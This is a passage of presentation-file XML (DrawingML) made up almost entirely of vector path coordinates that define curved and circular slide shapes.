                    <a:pt x="673401" y="1144333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675973" y="1159446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683688" y="1171035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1717087" y="2037556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1667836" y="2052592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1618886" y="2068297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1570242" y="2084666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1521912" y="2101695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1473901" y="2119378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1426215" y="2137712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1378860" y="2156693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1331842" y="2176315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285168" y="2196576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238842" y="2217469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192871" y="2238991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1147261" y="2261137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1102019" y="2283904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1057149" y="2307286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1012658" y="2331279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968552" y="2355879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924837" y="2381081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="881520" y="2406882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838605" y="2433276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="796099" y="2460259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="754008" y="2487828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712338" y="2515976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671095" y="2544701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630285" y="2573997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="589913" y="2603861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549987" y="2634287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510512" y="2665272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471493" y="2696812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432937" y="2728900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394851" y="2761535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357239" y="2794710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320108" y="2828421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283464" y="2862665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247312" y="2897436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211660" y="2932731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176512" y="2968545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141875" y="3004873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107755" y="3041712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74158" y="3079056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41090" y="3116902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8556" y="3155245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3189779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6681" y="3201158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22399" y="3205473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34851" y="3217837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49911" y="3219603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64994" y="3214305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77517" y="3205473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108786" y="3168049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140594" y="3131125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172933" y="3094703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205795" y="3058786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239176" y="3023377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273066" y="2988480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307460" y="2954096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342351" y="2920228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377731" y="2886881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413594" y="2854055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449932" y="2821755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486739" y="2789984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="524008" y="2758743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561732" y="2728036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599903" y="2697867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638516" y="2668237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677562" y="2639149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717036" y="2610607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="756930" y="2582613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="797237" y="2555171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837950" y="2528283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879063" y="2501951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="920568" y="2476180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="962458" y="2450971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004727" y="2426328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1047367" y="2402254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1090372" y="2378750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1133735" y="2355821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1177448" y="2333469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221506" y="2311698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265900" y="2290509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1310624" y="2269905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1355671" y="2249891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1401033" y="2230468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1446705" y="2211639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1492679" y="2193408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1538949" y="2175776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1585506" y="2158748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632345" y="2142326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1679458" y="2126512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1726839" y="2111310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1774480" y="2096723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1822375" y="2082753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1870516" y="2069403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1918897" y="2056677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1967511" y="2044576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2016350" y="2033104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2065408" y="2022265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2114679" y="2012059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2164154" y="2002492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2213827" y="1993565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2263691" y="1985281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2313739" y="1977643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2363965" y="1970654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2414361" y="1964318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2464920" y="1958636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2515635" y="1953611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2566500" y="1949248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2617507" y="1945548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2668650" y="1942514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719922" y="1940149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2771315" y="1938456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2822823" y="1937439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2874438" y="1937099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2925880" y="1937428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2977179" y="1938415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3028331" y="1940056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3079329" y="1942349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3130168" y="1945291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3180843" y="1948878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3231349" y="1953110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281679" y="1957982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3331830" y="1963492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3381794" y="1969637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3431567" y="1976415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3481144" y="1983822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3530518" y="1991856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3579685" y="2000515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3628639" y="2009795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3677375" y="2019694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3725887" y="2030208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3774170" y="2041336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3822218" y="2053075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3870027" y="2065421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3917590" y="2078372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3964902" y="2091925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4011958" y="2106078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4058752" y="2120828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4105279" y="2136171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4151534" y="2152106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4197511" y="2168630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4243204" y="2185739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4288609" y="2203431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4333720" y="2221704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4378531" y="2240554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4423037" y="2259978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4467233" y="2279975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4511113" y="2300541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4554672" y="2321674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4597904" y="2343370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4640804" y="2365628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4683366" y="2388444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4725586" y="2411815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4767457" y="2435739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4808975" y="2460213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4850134" y="2485235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4890928" y="2510801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4931352" y="2536909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4971400" y="2563556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5011068" y="2590739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5050350" y="2618456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5089240" y="2646704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5127733" y="2675480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5165823" y="2704781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5203506" y="2734605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5240775" y="2764949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5277626" y="2795809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5314052" y="2827184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5350049" y="2859071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5385611" y="2891467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5420733" y="2924369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5455409" y="2957774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5489633" y="2991679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5523401" y="3026083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5556707" y="3060982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5589546" y="3096373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5621911" y="3132254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5653799" y="3168621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5685202" y="3205473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5687562" y="3212735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5693791" y="3216463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5702615" y="3217837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5712761" y="3218033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5715121" y="3217837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5721350" y="3216463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5730174" y="3212735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5740320" y="3205473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5748035" y="3201158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5750607" y="3189779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5748035" y="3173691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5740320" y="3155245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5708251" y="3116873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5675645" y="3079049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5642509" y="3041772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5608851" y="3005045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5574677" y="2968868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5539994" y="2933242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5504809" y="2898170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5469130" y="2863652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5432963" y="2829689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5396316" y="2796283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5359194" y="2763434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5321606" y="2731145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5283558" y="2699417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5245056" y="2668250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5206109" y="2637646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5166723" y="2607606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5126905" y="2578131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5086663" y="2549224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5046002" y="2520884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5004930" y="2493113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4963453" y="2465913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4921580" y="2439284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4879317" y="2413228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4836671" y="2387747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4793648" y="2362841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4750256" y="2338511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4706502" y="2314760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4662393" y="2291588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4617936" y="2268996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4573137" y="2246985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4528004" y="2225558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4482543" y="2204715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4436763" y="2184457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4390669" y="2164786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4344268" y="2145703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4297568" y="2127209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4250576" y="2109306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4203298" y="2091994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4155741" y="2075275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5189140" y="1171035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5196855" y="1154142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5199427" y="1139618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5196855" y="1125118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5189140" y="1108297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5170634" y="1101224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5154723" y="1098867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5138812" y="1101224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5120306" y="1108297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4073064" y="2050129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4026119" y="2034102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3978724" y="2018789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3930901" y="2004188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3882669" y="1990300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3834049" y="1977125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3785061" y="1964663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3735725" y="1952913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3686063" y="1941876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3636094" y="1931552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3585838" y="1921940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3535316" y="1913040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3484549" y="1904852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433556" y="1897377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3382358" y="1890615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3330976" y="1884564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3279429" y="1879225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3227739" y="1874599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3175925" y="1870684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3124007" y="1867481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3072007" y="1864990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3019945" y="1863211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2967840" y="1862144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2915713" y="1861788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2915713" y="28289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2902815" y="7072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2874438" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="D4DB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596128" y="4472939"/>
              <a:ext cx="5156200" cy="1859280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5156200" h="1859279">
                  <a:moveTo>
                    <a:pt x="743712" y="1384566"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="740803" y="1337627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732345" y="1292440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718680" y="1249337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700138" y="1208671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677075" y="1170813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649859" y="1136078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618807" y="1104849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584288" y="1077455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546658" y="1054252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506247" y="1035608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463410" y="1021842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418490" y="1013333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371856" y="1010412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325208" y="1013333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280289" y="1021842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237451" y="1035608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197040" y="1054252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159410" y="1077455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124891" y="1104849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93840" y="1136078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66624" y="1170813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43561" y="1208671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25019" y="1249337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11353" y="1292440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2895" y="1337627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1384566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2895" y="1431493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11353" y="1476679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25019" y="1519783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43561" y="1560449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66624" y="1598307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93840" y="1633042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124891" y="1664271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159410" y="1691665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197040" y="1714868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237451" y="1733511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280289" y="1747278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325208" y="1755787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371856" y="1758696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418490" y="1755787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463410" y="1747278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506247" y="1733511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546658" y="1714868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584288" y="1691665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618807" y="1664271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649859" y="1633042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677075" y="1598307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700138" y="1560449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718680" y="1519783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732345" y="1476679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="740803" y="1431493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743712" y="1384566"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5156200" h="1859279">
                  <a:moveTo>
                    <a:pt x="2948940" y="374142"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2946031" y="327215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2937573" y="282028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2923908" y="238925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2905366" y="198259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882303" y="160401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2855087" y="125666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2824035" y="94437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2789517" y="67043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2751886" y="43840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2711475" y="25196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2668638" y="11430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2623718" y="2921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2577084" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2530437" y="2921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2485517" y="11430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2442680" y="25196"/>
                  </a:lnTo>
                  <a:lnTo>
